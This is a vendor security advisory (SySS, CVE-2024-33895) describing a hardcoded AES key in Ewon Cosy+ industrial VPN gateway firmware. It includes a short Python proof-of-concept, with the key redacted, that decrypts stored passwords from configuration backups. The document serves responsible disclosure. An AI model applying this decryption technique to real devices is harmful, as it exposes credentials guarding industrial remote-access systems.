Ewon Cosy+ Hardcoded Key

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2024-032
Product: Ewon Cosy+
Manufacturer: HMS Industrial Networks AB
Affected Version(s): Firmware Versions: < 21.2s10 and < 22.1s3
Tested Version(s): Firmware Version: 21.2s7
Vulnerability Type: Use of Hard-coded Cryptographic Key (CWE-321)
Risk Level: Medium
Solution Status: Fixed
Manufacturer Notification: 2024-04-10
Solution Date: 2024-07-18
Public Disclosure: 2024-08-11
CVE Reference: CVE-2024-33895
Author of Advisory: Moritz Abrell, SySS GmbH

Overview:

The Ewon Cosy+ is a VPN gateway used for remote access and maintenance  
in industrial environments.

The manufacturer describes the product as follows (see [1]):

"The Ewon Cosy+ gateway establishes a secure VPN connection between  
the machine (PLC, HMI, or other devices) and the remote engineer.  
The connection happens through Talk2m, a highly secured industrial  
cloud service. The Ewon Cosy+ makes industrial remote access easy  
and secure like never before!"

Due to the use of a hardcoded cryptographic key, an attacker is able to  
decrypt encrypted data and retrieve sensitive information.

Vulnerability Details:

The Ewon Cosy+ stores sensitive data such as passwords in an encrypted
format.
These values are included, e.g., in configuration backups.

However, a symmetric encryption algorithm (AES-CBC-256) with hardcoded
and static cryptographic keys is used.
Thus, an attacker is able to decrypt that data and retrieve sensitive
information.

Proof of Concept (PoC):

By analyzing the ELF executable "ewon" of an Ewon Cosy+ in a disassembler  
and decompiler, e.g. Ghidra, the encryption mechanism could be reversed  
and the hardcoded cryptographic key could be extracted.

Used encryption algorithm: AES in CBC mode with a key length of 256 bit

A simple Python script was developed to decrypt encrypted values:

********************  
import base64  
import sys  
from Crypto.Cipher import AES  
from binascii import unhexlify

def pad(text):  
     padding_length = AES.block_size - (len(text) % AES.block_size)  
     padded_text = text + bytes([padding_length] * padding_length)  
     return padded_text, padding_length

encoded_text = sys.argv[1]

key_hex = "6367b0 [...]" # redacted  
iv_hex = "28c9 [...]" # redacted

key = unhexlify(key_hex)  
iv = unhexlify(iv_hex)

decoded_text = base64.b64decode(encoded_text[4:])  
padded_text, padding_length = pad(decoded_text)  
cipher = AES.new(key, AES.MODE_CBC, iv)  
decrypted_text = cipher.decrypt(padded_text)

print("Plaintext: {}".format(  
     decrypted_text[1:][:-padding_length-2].decode('utf-8')  
     ))  
****************

$> python3 decrypt_ewon_pwd.py "#_5_YARU3GSgNcElltjyMMqWfZwb"  
Plaintext: adm:123

Solution:

According to the manufacturer note[4], the vulnerability was fixed
with the firmware versions 21.2s10 and 22.1s3.

Disclosure Timeline:

2024-04-04: Vulnerability discovered  
2024-04-10: Vulnerability reported to manufacturer  
2024-04-11: Manufacturer acknowlegded the vulnerabilities and asked for  
             a publication date for all findings  
2024-04-12: Proposed dates for a discussion about publication  
2024-04-19: Manufacturer sent a technical overview of planned remediation  
             actions and details about the planned timeline  
2024-04-30: CVE ID CVE-2024-33893[5] assigned by the manufacturer  
2024-05-31: Manufacturer informed that the fix is in completion stage and  
             asked if the blog post[6] can be reviewed by HMS  
2024-06-04: Proposed dates to review the blog post draft  
2024-06-21: Inquiry about the status  
2024-06-21: Received an out-of-office auto reply  
2024-07-01: Inquiry about the status  
2024-07-04: Inquiry about the status  
2024-07-12: Inquiry about the status and letting the manufacturer know that  
             the vulnerability will be published within a talk at DEF CON[7]  
             in August  
2024-07-12: Manufacturer responded that the fix is planned by the end of  
             July; manufacturer asked again for reviewing the blog post  
             draft  
2024-07-12: Again confirmed reviewing the blog post is possible and asking  
             for the sending of details  
2024-07-17: Blog post provided to HMS  
2024-07-18: Fixed firmware versions 21.2s10 and 22.1s3 released by HMS  
2024-07-23: Inquiry about the status  
2024-07-23: Manufacturer reviewed the blog post and confirmed that a  
             fix is provided  
2024-07-29: Discussion with HMS about the blog post and final publication  
             actions  
2024-08-11: Vulnerability disclosed at DEF CON[7]  
2024-08-11: Blog post published[6]

References:

[1] Ewon Cosy+ product website
https://www.hms-networks.com/p/ec71330-00ma-ewon-cosy-ethernet
[2] SySS Security Advisory SYSS-2024-032
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-032.txt
[3] SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy
[4] Manufacturer note
https://hmsnetworks.blob.core.windows.net/nlw/docs/default-source/products/cybersecurity/security-advisory/hms-security-advisory-2024-07-29-001–ewon-several-cosy–vulnerabilities.pdf
[5] CVE-2024-33895
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-33895
[6] Blog post
https://blog.syss.com/posts/hacking-a-secure-industrial-remote-access-gateway/
[7] DEF CON talk
https://defcon.org/html/defcon-32/dc-32-speakers.html#54521

Credits:

This security vulnerability was found by Moritz Abrell of SySS GmbH.

E-Mail:[email protected]  
Public Key:https://www.syss.de/fileadmin/dokumente/PGPKeys/Moritz_Abrell.asc  
Key Fingerprint: 2927 7EB6 1A20 0679 79E9  87E6 AE0C 9BF8 F134 8B53

Disclaimer:

The information provided in this security advisory is provided “as is”
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL:http://creativecommons.org/licenses/by/3.0/deed.en  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEKSd+thogBnl56Yfmrgyb+PE0i1MFAmay420ACgkQrgyb+PE0  
i1NNyw/9GzNMWrKeghrwqgcJ01f8QJGo1L3ObWscyiMXxqne6Zo8VyIefvGY97hb  
fZisL4BrzmK+NioLeP3SzM879yGbzU5dca7g5Cqf0qJh9mdU/s6tkgdK+Duz3QdZ  
9XPV+ovSDGSDk953fVhHrKUdsns9hMnRIoMkfPxZUm+KWXRIwRguNxl2/q1xxgjt  
2kqTldwgwgekKXXp+Uwt5Z8LUG0dU7pHHb3OCizJ81tOCHjwuJA3aUmyBachl4Vc  
Nw7GwByxoKLTTEfj2CWtkfC4u9UXHUQJBDl51+qRPIVkG2g0jTSQ2AEIubtmi7IA  
jA/8PK5QONh0GHptj2LzeTqlcEX7834uIE0gHrR5pkFJvgUWoNueEZ9FIHRNZPLX  
9Lhu52uiKogX5BVYeRIkbHAxmgf/wojQ4AXE9BMvOgm0HSzjgIaVZ+cqNkMP1ey0  
uDXPllHkWtA1IBeffhiVrfc11fLJJczkpN3hRevoa4D6hlNvOYrVUAY869vrJkA2  
LHvFwLf1JDQaGiPCkglCcipjtXw+hqGE+zEYOWobXH4cIwdnPUG+VaAks9GcNEdN  
o6QVfnLTveo8e1u11z8ftguYthMbhOJxVWPBWJv6XhiCXEw8Gh/HonR6LfGQyRTe  
Fk+qtF1Mih2ZNKnW+XmHHCjtXGgiarfjExVFnhXHbrE8sOHv90I=  
=/d8q  
-----END PGP SIGNATURE-----